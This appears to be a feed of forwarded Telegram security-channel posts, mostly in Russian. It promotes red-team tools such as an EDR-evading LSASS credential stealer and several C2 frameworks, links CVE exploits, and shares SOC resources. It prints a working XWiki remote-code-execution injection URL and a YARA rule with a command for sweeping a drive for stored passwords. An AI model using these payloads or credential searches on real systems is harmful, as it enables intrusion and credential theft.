Forwarded from APT
🔑 lsassStealer
lsassStealer is a tool designed to dump the memory of the Windows process "lsass.exe". The dump is performed entirely in RAM, then compressed using the zlib library and fragmented for transmission via UDP packets disguised as NTP packets. This method helps reduce detection by security solutions such as Windows Defender and advanced Endpoint Detection and Response (EDR) tools.
🔗 Source:
https://github.com/Aur3ns/lsassStealer
#windows #lsass #edr #bypass
lsassStealer is a tool designed to dump the memory of the Windows process "lsass.exe". The dump is performed entirely in RAM, then compressed using the zlib library and fragmented for transmission via UDP packets disguised as NTP packets. This method helps reduce detection by security solutions such as Windows Defender and advanced Endpoint Detection and Response (EDR) tools.
🔗 Source:
https://github.com/Aur3ns/lsassStealer
#windows #lsass #edr #bypass
GitHub
GitHub - Aur3ns/LsassStealer: Morpheus is an lsass stealer that extracts lsass.exe in RAM and exfiltrates it via forged and crypted…
Morpheus is an lsass stealer that extracts lsass.exe in RAM and exfiltrates it via forged and crypted NTP packets. For authorized testing only! - Aur3ns/LsassStealer
Forwarded from AP Security
#pentest
PoC CVE-2025-1094
В СУБД PostgreSQL обнаружена уязвимость внедрения SQL-кода, связанная с некорректной обработкой интерактивным инструментом PostgreSQL psql определенных недопустимых байтовых последовательностей в символах UTF-8. Затронуты все версии PostgreSQL до 17.3, 16.7, 15.11, 14.16 и 13.19.
Познакомиться с эксплойтом можно по следующей ссылке.
PoC CVE-2025-1094
В СУБД PostgreSQL обнаружена уязвимость внедрения SQL-кода, связанная с некорректной обработкой интерактивным инструментом PostgreSQL psql определенных недопустимых байтовых последовательностей в символах UTF-8. Затронуты все версии PostgreSQL до 17.3, 16.7, 15.11, 14.16 и 13.19.
Познакомиться с эксплойтом можно по следующей ссылке.
GitHub
GitHub - soltanali0/CVE-2025-1094-Exploit: WebSocket and SQL Injection Exploit Script
WebSocket and SQL Injection Exploit Script. Contribute to soltanali0/CVE-2025-1094-Exploit development by creating an account on GitHub.
👍3
Forwarded from s0ld13r ch. (s0ld13r)
XiebroC2 - open-source аналог CobaltStrike из Китая 😏
XiebroC2 позиционируется как многофункциональный C2-фреймворк с телеграм-нотификациями и поддержкой скриптов на Lua. Аналог Cobalt Strike, но с открытым кодом и фишками под RedTeam задачи⌨️
Фичи👈
1️⃣ Кроссплатформеннный имплант на Golang под популярные семейства ОС
2️⃣ Управление через client: файлы, процессы, сетевой трафик, инъекции, скриншоты, reverse shell/reverse proxy
3️⃣ Возможность автоматически уведомлять о новых сессиях в Telegram
Помимо 3 основных фич есть возможность писать собственные плагины, для расширения функциональности и многое другое🚬
Едиственный минус который я для себя заметил, это то что клиент и сервер только под Windows, можно конечно обернуть под Wine но это уже будет совсем другая история😔
🔗 Repo: https://github.com/INotGreen/XiebroC2.git
🔗 Plugins: https://github.com/INotGreen/Xiebro-Plugins
🔗 Demo: https://www.youtube.com/watch?v=iZpltGdu4Y4
@s0ld13r_ch
XiebroC2 позиционируется как многофункциональный C2-фреймворк с телеграм-нотификациями и поддержкой скриптов на Lua. Аналог Cobalt Strike, но с открытым кодом и фишками под RedTeam задачи
Фичи
Помимо 3 основных фич есть возможность писать собственные плагины, для расширения функциональности и многое другое
Едиственный минус который я для себя заметил, это то что клиент и сервер только под Windows, можно конечно обернуть под Wine но это уже будет совсем другая история
🔗 Repo: https://github.com/INotGreen/XiebroC2.git
🔗 Plugins: https://github.com/INotGreen/Xiebro-Plugins
🔗 Demo: https://www.youtube.com/watch?v=iZpltGdu4Y4
@s0ld13r_ch
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SecuriXy.kz
В OpenSource платформе XWiki (https://www.xwiki.org/xwiki/bin/view/Main/WebHome) нашли #RCE CVE-2025-24893
PoC:
https://github.com/advisories/GHSA-rr6p-3pfg-562j
PoC:
<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20
https://github.com/advisories/GHSA-rr6p-3pfg-562j
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Специальный фреймворк для потрошения браузеров. Типа "C2" со своим сервером, а агент устанавливается как расширение для браузера.
Blog: https://medium.com/@darkrain2009/redext-browser-extension-based-command-control-framework-1eec1402f146
Soft: https://github.com/Darkrain2009/RedExt
Возможностей там много, от просмотра данных, до скриншотов и захвата ввода)
#c2 #pentest #redteam #creds
Blog: https://medium.com/@darkrain2009/redext-browser-extension-based-command-control-framework-1eec1402f146
Soft: https://github.com/Darkrain2009/RedExt
Возможностей там много, от просмотра данных, до скриншотов и захвата ввода)
#c2 #pentest #redteam #creds
Medium
RedExt — Offensive Chrome extension framework
RedExt: Exploring Chrome Extensions for Red Team Operations
Forwarded from #memekatz
This media is not supported in your browser
VIEW IN TELEGRAM
Когда уложил прод пэйлоадом из ChatGPT
😁2
Forwarded from AP Security
#soc
Windows Eventlog ID's
В данном репозитории собрана полезная информация для аналитиков безопасности в разрезе безопасности корпоративных доменов.
Windows Eventlog ID's
В данном репозитории собрана полезная информация для аналитиков безопасности в разрезе безопасности корпоративных доменов.
GitHub
Active_Directory_Advanced_Threat_Hunting/MITRE_ATT&CK_Techniques_Windows_Eventlog_IDs.md at main · tomwechsler/Active_Director…
This repo is about Active Directory Advanced Threat Hunting - tomwechsler/Active_Directory_Advanced_Threat_Hunting
👍1
www.opennet.ru
Уязвимость в LibreOffice, позволяющая выполнить скрипт через подстановку ссылки в документ
Раскрыта информация об уязвимости (CVE-2025-1080), позволяющей добиться выполнения произвольного скрипта без вывода предупреждения пользователю при переходе по специально подготовленной ссылке в документе или при срабатывании определённого события во время…
🔗Ссылка:
https://opennet.ru/62836/
https://opennet.ru/62836/
Forwarded from s0ld13r ch. (s0ld13r)
S0LD13R - Offensive YARA 😄
🚨 Caution: Use for educational purposes only, author is not responsible for your actions 🚨
В классическом представлении YARA — это инструмент для поиска вредоносных файлов и индикаторов компрометации (IoC). Но в реальности YARA может стать отличным помощником на этапах пентеста и Red Team операций🕺
T1552.001 Unsecured Credentials: Credentials In Files - техника применяемая для поиска паролей и ключей для получения доступов в различные системы. Пентестер проникает на хост и ищет креды для повышения привилегий или бокового перемещения. Данный этап можно автоматизировать при помощи Yara сигнатур, осуществляя поиск по файлам в директориях и строкам в них🥂
PoC:
Command line👩💻
Детект🛡
Регулярный мониторинг на стороне EDR, так как поведение может быть аномальным для хоста и легко обнаруживается.
Применять строго в целях тестирования и с разрешения собственника системы
@s0ld13r_ch
🚨 Caution: Use for educational purposes only, author is not responsible for your actions 🚨
В классическом представлении YARA — это инструмент для поиска вредоносных файлов и индикаторов компрометации (IoC). Но в реальности YARA может стать отличным помощником на этапах пентеста и Red Team операций
T1552.001 Unsecured Credentials: Credentials In Files - техника применяемая для поиска паролей и ключей для получения доступов в различные системы. Пентестер проникает на хост и ищет креды для повышения привилегий или бокового перемещения. Данный этап можно автоматизировать при помощи Yara сигнатур, осуществляя поиск по файлам в директориях и строкам в них
PoC:
rule ClearTextPasswords_Search_Extended
{
strings:
$password1 = "password"
$password2 = "pwd"
$password3 = "пароль"
$password4 = "Password"
$password6 = "Пароль"
condition:
any of them and (filesize < 5MB)
}
Command line
.\yara64.exe .\rule.yar C:\
Детект
Регулярный мониторинг на стороне EDR, так как поведение может быть аномальным для хоста и легко обнаруживается.
Применять строго в целях тестирования и с разрешения собственника системы
@s0ld13r_ch
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Кибер ПТУ | Кибербезопасность
1737530444609.pdf
383.9 KB
Одна из самых популярных точек входа в мир кибербезопасности через инженера SOC L1. Более того, эта позиция дает достаточно очевидный и прозрачный рост в сторону L2 и L3. Единственный нюанс – многие до сих пор думают, что SOC, это что-то про мониторинг инцидентов, хотя это далеко не так.
Я тут наткнулся на годный файлик, в котором подробно и лаконично расписана вся подноготная SOC – начиная с его структуры, заканчивая описанием каждой роли внутри него. Более того, там даже есть заметки на тему того, чего не хватает ребятам с L1 для того, чтобы перейти на L2 и так далее.
В общем, делюсь. Кажется, такие вещи нужно знать всем безопасникам.
#SOC #BaseSecurity
🧠 Твой Пакет Знаний | 🛍 Другие каналы
Я тут наткнулся на годный файлик, в котором подробно и лаконично расписана вся подноготная SOC – начиная с его структуры, заканчивая описанием каждой роли внутри него. Более того, там даже есть заметки на тему того, чего не хватает ребятам с L1 для того, чтобы перейти на L2 и так далее.
В общем, делюсь. Кажется, такие вещи нужно знать всем безопасникам.
#SOC #BaseSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM